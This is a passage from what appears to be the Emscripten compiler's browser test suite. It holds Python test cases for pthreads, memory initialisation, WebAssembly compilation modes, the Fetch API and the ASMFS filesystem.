self.btest(path_from_root('tests', 'pthread', 'test_pthread_nested_spawns.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=2'], timeout=30)
# Test that main thread can wait for a pthread to finish via pthread_join().
def test_pthread_join(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_join.cpp'), expected='6765', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ERROR_ON_UNDEFINED_SYMBOLS=1'], timeout=30)
# Test pthread_cancel() operation
def test_pthread_cancel(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cancel.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test pthread_kill() operation
def test_pthread_kill(self):
if get_browser() and 'chrom' in get_browser().lower():
# This test hangs the Chrome render process and keeps subsequent tests from passing too
self.skipTest("pthread_kill hangs chrome renderer")
self.btest(path_from_root('tests', 'pthread', 'test_pthread_kill.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test that pthread cleanup stack (pthread_cleanup_push/_pop) works.
def test_pthread_cleanup(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cleanup.cpp'), expected='907640832', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Tests the pthread mutex api.
def test_pthread_mutex(self):
for arg in [[], ['-DSPINLOCK_TEST']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_mutex.cpp'), expected='50', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, timeout=30)
# Test that memory allocation is thread-safe.
def test_pthread_malloc(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Stress test pthreads allocating memory that will call sbrk(), while the main thread has to free up the data.
def test_pthread_malloc_free(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc_free.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'TOTAL_MEMORY=256MB'], timeout=30)
# Test that the pthread_barrier API works ok.
def test_pthread_barrier(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_barrier.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test the pthread_once() function.
def test_pthread_once(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_once.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test against a certain thread exit time handling bug by spawning tons of threads.
def test_pthread_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_spawns.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# It is common for code to flip volatile global vars for thread control. This is a bit lax, but nevertheless, test whether that
# kind of scheme will work with Emscripten as well.
def test_pthread_volatile(self):
for arg in [[], ['-DUSE_C_VOLATILE']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_volatile.cpp'), expected='1', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, timeout=30)
# Test thread-specific data (TLS).
def test_pthread_thread_local_storage(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_thread_local_storage.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test the pthread condition variable creation and waiting.
def test_pthread_condition_variable(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_condition_variable.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test that pthreads are able to do printf.
def test_pthread_printf(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_printf.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=1'], timeout=30)
# Test that pthreads are able to do cout. Failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858.
def test_pthread_iostream(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_iostream.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=1'], timeout=30)
# Test that the main thread is able to use pthread_set/getspecific.
def test_pthread_setspecific_mainthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_setspecific_mainthread.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm'], timeout=30)
self.prep_no_SAB()
self.btest(path_from_root('tests', 'pthread', 'test_pthread_setspecific_mainthread.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '--shell-file', 'html.html', '-s', 'WASM=0'], timeout=30)
# Test the -s PTHREAD_HINT_NUM_CORES=x command line variable.
def test_pthread_num_logical_cores(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_num_logical_cores.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_HINT_NUM_CORES=2'], timeout=30)
self.prep_no_SAB()
self.btest(path_from_root('tests', 'pthread', 'test_pthread_num_logical_cores.cpp'), expected='0', args=['-O3', '-g', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_HINT_NUM_CORES=2', '--shell-file', 'html.html', '-s', 'WASM=0'], timeout=30)
# Test that pthreads have access to filesystem.
def test_pthread_file_io(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_file_io.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=1'], timeout=30)
# Test that the pthread_create() function operates benignly in the case that threading is not supported.
def test_pthread_supported(self):
for args in [[], ['-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_supported.cpp'), expected='0', args=['-O3'] + args, timeout=30)
def test_pthread_separate_asm_pthreads(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '--separate-asm', '--profiling'], timeout=30)
def test_pthread_custom_pthread_main_url(self):
self.clear()
os.makedirs(os.path.join(self.get_dir(), 'cdn'))
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten/emscripten.h>
#include <emscripten/threading.h>
#include <pthread.h>
int result = 0;
void *thread_main(void *arg) {
emscripten_atomic_store_u32(&result, 1);
pthread_exit(0);
}
int main() {
pthread_t t;
if (emscripten_has_threading_support()) {
pthread_create(&t, 0, thread_main, 0);
pthread_join(t, 0);
} else {
result = 1;
}
REPORT_RESULT(result);
}
'''))
# Test that it is possible to define a "Module.locateFile" callback to control where pthread-main.js will be loaded from.
open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'shell.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS=1', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-o', 'test.html']).communicate()
shutil.move('pthread-main.js', os.path.join('cdn', 'pthread-main.js'))
self.run_browser('test.html', '', '/report_result?1')
# Test that it is possible to define "Module.locateFile(foo)" function to locate where pthread-main.js will be loaded from.
open(self.in_dir('shell2.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "pthread-main.js") return "cdn/pthread-main.js"; else return filename; }, '))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'shell2.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS=1', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-o', 'test2.html']).communicate()
try_delete('pthread-main.js')
self.run_browser('test2.html', '', '/report_result?1')
# Test that when the main thread is performing a futex wait while a pthread needs it to do a proxied operation (before that pthread would wake up the main thread), this does not deadlock.
def test_pthread_proxying_in_futex_wait(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxying_in_futex_wait.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '-s', 'PTHREAD_POOL_SIZE=1', '--separate-asm'], timeout=30)
# Test that sbrk() operates properly in multithreaded conditions
def test_pthread_sbrk(self):
for aborting_malloc in [0, 1]:
print('aborting malloc=' + str(aborting_malloc))
# With aborting malloc = 1, test allocating memory in threads
# With aborting malloc = 0, allocate so much memory in threads that some of the allocations fail.
self.btest(path_from_root('tests', 'pthread', 'test_pthread_sbrk.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '--separate-asm', '-s', 'ABORTING_MALLOC=' + str(aborting_malloc), '-DABORTING_MALLOC=' + str(aborting_malloc), '-s', 'TOTAL_MEMORY=128MB'], timeout=30)
# Test that -s ABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully)
def test_pthread_gauge_available_memory(self):
for opts in [[], ['-O2']]:
for args in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'gauge_available_memory.cpp'), expected='1', args=['-s', 'ABORTING_MALLOC=0'] + args + opts, timeout=30)
# Test that the proxying operations of user code from pthreads to main thread work
def test_pthread_run_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '-s', 'PTHREAD_POOL_SIZE=1', '--separate-asm'], timeout=30)
# Test how a lot of back-to-back called proxying operations behave.
def test_pthread_run_on_main_thread_flood(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread_flood.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '-s', 'PTHREAD_POOL_SIZE=1', '--separate-asm'], timeout=30)
# Test that it is possible to synchronously call a JavaScript function on the main thread and get a return value back.
def test_pthread_call_sync_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
def test_pthread_call_async_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS=1', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
# Tests that spawning a new thread does not cause a reinitialization of the global data section of the application memory area.
def test_pthread_global_data_initialization(self):
for mem_init_mode in [[], ['--memory-init-file', '0'], ['--memory-init-file', '1'], ['-s', 'MEM_INIT_METHOD=2']]:
for args in [[], ['-O3']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that emscripten_get_now() reports coherent wallclock times across all pthreads, instead of each pthread independently reporting wallclock times since the launch of that pthread.
def test_pthread_clock_drift(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_clock_drift.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# test atomicrmw i64
def test_atomicrmw_i64(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
Popen([PYTHON, EMCC, path_from_root('tests', 'atomicrmw_i64.ll'), '-s', 'USE_PTHREADS=1', '-s', 'IN_TEST_HARNESS=1', '-o', 'test.html', '-s', 'WASM=0']).communicate()
self.run_browser('test.html', None, '/report_result?0')
# Test that it is possible to send a signal by calling alarm(timeout), which in turn invokes the signal handler set by signal(SIGALRM, func).
def test_sigalrm(self):
self.btest(path_from_root('tests', 'sigalrm.cpp'), expected='0', args=['-O3'], timeout=30)
def test_meminit_pairs(self):
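    # Build a C source embedding every two-byte combination (0x00..0xff x 0x00..0xff) as string
    # data, appending tests/meminit_pairs.c, to exercise MEM_INIT_METHOD=2 with arbitrary bytes.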
d = 'const char *data[] = {\n "'
d += '",\n "'.join(''.join('\\x{:02x}\\x{:02x}'.format(i, j)
for j in range(256)) for i in range(256))
with open(path_from_root('tests', 'meminit_pairs.c')) as f:
d += '"\n};\n' + f.read()
args = ["-O2", "--memory-init-file", "0", "-s", "MEM_INIT_METHOD=2", "-s", "ASSERTIONS=1", '-s', 'WASM=0']
self.btest(d, expected='0', args=args + ["--closure", "0"])
self.btest(d, expected='0', args=args + ["--closure", "0", "-g"])
self.btest(d, expected='0', args=args + ["--closure", "1"])
def test_meminit_big(self):
d = 'const char *data[] = {\n "'
d += '",\n "'.join([''.join('\\x{:02x}\\x{:02x}'.format(i, j)
for j in range(256)) for i in range(256)] * 256)
with open(path_from_root('tests', 'meminit_pairs.c')) as f:
d += '"\n};\n' + f.read()
assert len(d) > (1 << 27) # more than 32M memory initializer
args = ["-O2", "--memory-init-file", "0", "-s", "MEM_INIT_METHOD=2", "-s", "ASSERTIONS=1", '-s', 'WASM=0']
self.btest(d, expected='0', args=args + ["--closure", "0"])
self.btest(d, expected='0', args=args + ["--closure", "0", "-g"])
self.btest(d, expected='0', args=args + ["--closure", "1"])
def test_canvas_style_proxy(self):
self.btest('canvas_style_proxy.c', expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests/canvas_style_proxy_shell.html'), '--pre-js', path_from_root('tests/canvas_style_proxy_pre.js')])
def test_canvas_size_proxy(self):
self.btest(path_from_root('tests', 'canvas_size_proxy.c'), expected='0', args=['--proxy-to-worker'])
def test_custom_messages_proxy(self):
self.btest(path_from_root('tests', 'custom_messages_proxy.c'), expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests', 'custom_messages_proxy_shell.html'), '--post-js', path_from_root('tests', 'custom_messages_proxy_postjs.js')])
def test_separate_asm(self):
for opts in [['-O0'], ['-O1'], ['-O2'], ['-O2', '--closure', '1']]:
print(opts)
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
run_process([PYTHON, EMCC, 'src.cpp', '-o', 'test.html', '-s', 'WASM=0'] + opts)
self.run_browser('test.html', None, '/report_result?0')
print('run one')
open('one.html', 'w').write('<script src="test.js"></script>')
self.run_browser('one.html', None, '/report_result?0')
print('run two')
run_process([PYTHON, path_from_root('tools', 'separate_asm.py'), 'test.js', 'asm.js', 'rest.js'])
open('two.html', 'w').write('''
<script>
var Module = {};
</script>
<script src="asm.js"></script>
<script src="rest.js"></script>
''')
self.run_browser('two.html', None, '/report_result?0')
print('run hello world')
self.clear()
assert not os.path.exists('tests.asm.js')
self.btest('browser_test_hello_world.c', expected='0', args=opts + ['-s', 'WASM=0', '--separate-asm'])
assert os.path.exists('test.asm.js')
os.unlink('test.asm.js')
print('see a fail')
self.run_browser('test.html', None, '[no http server activity]', timeout=5) # fail without the asm
def test_emterpretify_file(self):
open('shell.html', 'w').write('''
<!--
{{{ SCRIPT }}} // ignore this, we do it ourselves
-->
<script>
var Module = {};
var xhr = new XMLHttpRequest();
xhr.open('GET', 'code.dat', true);
xhr.responseType = 'arraybuffer';
xhr.onload = function() {
Module.emterpreterFile = xhr.response;
var script = document.createElement('script');
script.src = "test.js";
document.body.appendChild(script);
};
xhr.send(null);
</script>
''')
try_delete('code.dat')
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_FILE="code.dat"', '-O2', '-g', '--shell-file', 'shell.html', '-s', 'ASSERTIONS=1'])
assert os.path.exists('code.dat')
try_delete('code.dat')
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_FILE="code.dat"', '-O2', '-g', '-s', 'ASSERTIONS=1'])
assert os.path.exists('code.dat')
def test_vanilla_html_when_proxying(self):
for opts in [0, 1, 2]:
print(opts)
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'test.js', '-O' + str(opts), '--proxy-to-worker']).communicate()
open('test.html', 'w').write('<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
def test_in_flight_memfile_request(self):
# test the XHR for an asm.js mem init file being in flight already
for o in [0, 1, 2]:
print(o)
opts = ['-O' + str(o), '-s', 'WASM=0']
print('plain html')
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'in_flight_memfile_request.c')).read()))
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'test.js'] + opts).communicate()
open('test.html', 'w').write('<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0') # never when we provide our own HTML like this.
print('default html')
self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+)
def test_split_memory_large_file(self):
size = 2 * 1024 * 1024
open('huge.dat', 'wb').write(bytearray((x * x) & 255 for x in range(size * 2))) # larger than a memory chunk
self.btest('split_memory_large_file.cpp', expected='1', args=['-s', 'WASM=0', '-s', 'SPLIT_MEMORY=' + str(size), '-s', 'TOTAL_MEMORY=128MB', '-s', 'TOTAL_STACK=10240', '--preload-file', 'huge.dat'], timeout=60)
def test_binaryen_interpreter(self):
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'BINARYEN=1', '-s', 'BINARYEN_METHOD="interpret-binary"'])
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'BINARYEN=1', '-s', 'BINARYEN_METHOD="interpret-binary"', '-O2'])
def test_binaryen_async(self):
# notice when we use async compilation
script = '''
<script>
// note if we do async compilation
var real_wasm_instantiate = WebAssembly.instantiate;
var real_wasm_instantiateStreaming = WebAssembly.instantiateStreaming;
if (typeof real_wasm_instantiateStreaming === 'function') {
WebAssembly.instantiateStreaming = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiateStreaming(a, b);
};
} else {
WebAssembly.instantiate = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiate(a, b);
};
}
// show stderr for the viewer's fun
err = function(x) {
out('<<< ' + x + ' >>>');
console.log(x);
};
</script>
{{{ SCRIPT }}}
'''
shell_with_script('shell.html', 'shell.html', script)
common_args = ['-s', 'WASM=1', '--shell-file', 'shell.html']
for opts, expect in [
([], 1),
(['-O1'], 1),
(['-O2'], 1),
(['-O3'], 1),
(['-s', 'BINARYEN_ASYNC_COMPILATION=1'], 1), # force it on
(['-O1', '-s', 'BINARYEN_ASYNC_COMPILATION=0'], 0), # force it off
(['-s', 'BINARYEN_ASYNC_COMPILATION=1', '-s', 'BINARYEN_METHOD="native-wasm,asmjs"'], 0), # try to force it on, but have it disabled
]:
print(opts, expect)
self.btest('binaryen_async.c', expected=str(expect), args=common_args + opts)
# Ensure that compilation still works and is async without instantiateStreaming available
no_streaming = ' <script> WebAssembly.instantiateStreaming = undefined;</script>'
shell_with_script('shell.html', 'shell.html', no_streaming + script)
self.btest('binaryen_async.c', expected='1', args=common_args)
# Test that implementing Module.instantiateWasm() callback works.
def test_manual_wasm_instantiate(self):
src = os.path.join(self.get_dir(), 'src.cpp')
open(src, 'w').write(self.with_report_result(open(os.path.join(path_from_root('tests/manual_wasm_instantiate.cpp'))).read()))
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'manual_wasm_instantiate.js', '-s', 'BINARYEN=1']).communicate()
shutil.copyfile(path_from_root('tests', 'manual_wasm_instantiate.html'), os.path.join(self.get_dir(), 'manual_wasm_instantiate.html'))
self.run_browser('manual_wasm_instantiate.html', 'wasm instantiation succeeded', '/report_result?1')
def test_binaryen_worker(self):
self.do_test_worker(['-s', 'WASM=1'])
def test_wasm_locate_file(self):
# Test that it is possible to define "Module.locateFile(foo)" function to locate where pthread-main.js will be loaded from.
self.clear()
os.makedirs(os.path.join(self.get_dir(), 'cdn'))
open('shell2.html', 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.wasm") return "cdn/test.wasm"; else return filename; }, '))
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
subprocess.check_call([PYTHON, EMCC, 'src.cpp', '--shell-file', 'shell2.html', '-s', 'WASM=1', '-o', 'test.html'])
shutil.move('test.wasm', os.path.join('cdn', 'test.wasm'))
self.run_browser('test.html', '', '/report_result?0')
def test_utf8_textdecoder(self):
self.btest('benchmark_utf8.cpp', expected='0', args=['--embed-file', path_from_root('tests/utf8_corpus.txt') + '@/utf8_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF8ToString"]'])
def test_utf16_textdecoder(self):
self.btest('benchmark_utf16.cpp', expected='0', args=['--embed-file', path_from_root('tests/utf16_corpus.txt') + '@/utf16_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF16ToString","stringToUTF16","lengthBytesUTF16"]'])
def test_webgl_offscreen_canvas_in_pthread(self):
for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]:
self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL'])
def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self):
for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]:
self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args + ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL'])
# Tests that -s OFFSCREEN_FRAMEBUFFER=1 rendering works.
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DEXPLICIT_SWAP=1'])
# Tests the feature that the shell html page can preallocate the typed array and place it in Module.buffer before loading the script page.
# In this build mode, the -s TOTAL_MEMORY=xxx option will be ignored.
# Preallocating the buffer in this way is asm.js only (wasm needs a Memory).
def test_preallocated_heap(self):
self.btest('test_preallocated_heap.cpp', expected='1', args=['-s', 'WASM=0', '-s', 'TOTAL_MEMORY=16MB', '-s', 'ABORTING_MALLOC=0', '--shell-file', path_from_root('tests', 'test_preallocated_heap_shell.html')])
# Tests emscripten_fetch() usage to XHR data directly to memory without persisting results to IndexedDB.
def test_fetch_to_memory(self):
# Test error reporting in the negative case when the file URL doesn't exist. (http 404)
self.btest('fetch/to_memory.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-DFILE_DOES_NOT_EXIST'])
# Test the positive case when the file URL exists. (http 200)
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/to_memory.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0'])
# Tests emscripten_fetch() usage to persist an XHR into IndexedDB and subsequently load up from there.
def test_fetch_cached_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/cached_xhr.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0'])
# Tests that response headers get set on emscripten_fetch_t values.
def test_fetch_response_headers(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/response_headers.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'WASM=0'])
# Test emscripten_fetch() usage to stream an XHR into memory without storing the full file in memory
def test_fetch_stream_file(self):
# Strategy: create a large 128MB file, and compile with a small 16MB Emscripten heap, so that the tested file
# won't fully fit in the heap. This verifies that streaming works properly.
f = open('largefile.txt', 'w')
s = '12345678'
for i in range(14):
s = s[::-1] + s # length of str will be 2^17=128KB
for i in range(1024):
f.write(s)
f.close()
self.btest('fetch/stream_file.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'TOTAL_MEMORY=536870912'])
# Tests emscripten_fetch() usage in synchronous mode when used from the main thread proxied to a Worker with -s PROXY_TO_PTHREAD=1 option.
def test_fetch_sync_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/sync_xhr.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Tests that the Fetch API works for synchronous XHRs when used with --proxy-to-worker.
def test_fetch_sync_xhr_in_proxy_to_worker(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/sync_xhr.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '--proxy-to-worker'])
def test_fetch_idb_store(self):
self.btest('fetch/idb_store.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD=1'])
def test_fetch_idb_delete(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/idb_delete.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD=1'])
def test_asmfs_hello_file(self):
# Test basic file loading and the valid character set for files.
os.mkdir(os.path.join(self.get_dir(), 'dirrey'))
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), os.path.join(self.get_dir(), 'dirrey', 'hello file !#$%&\'()+,-.;=@[]^_`{}~ %%.txt'))
self.btest('asmfs/hello_file.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
def test_asmfs_read_file_twice(self):
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), os.path.join(self.get_dir(), 'hello_file.txt'))
self.btest('asmfs/read_file_twice.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
def test_asmfs_fopen_write(self):
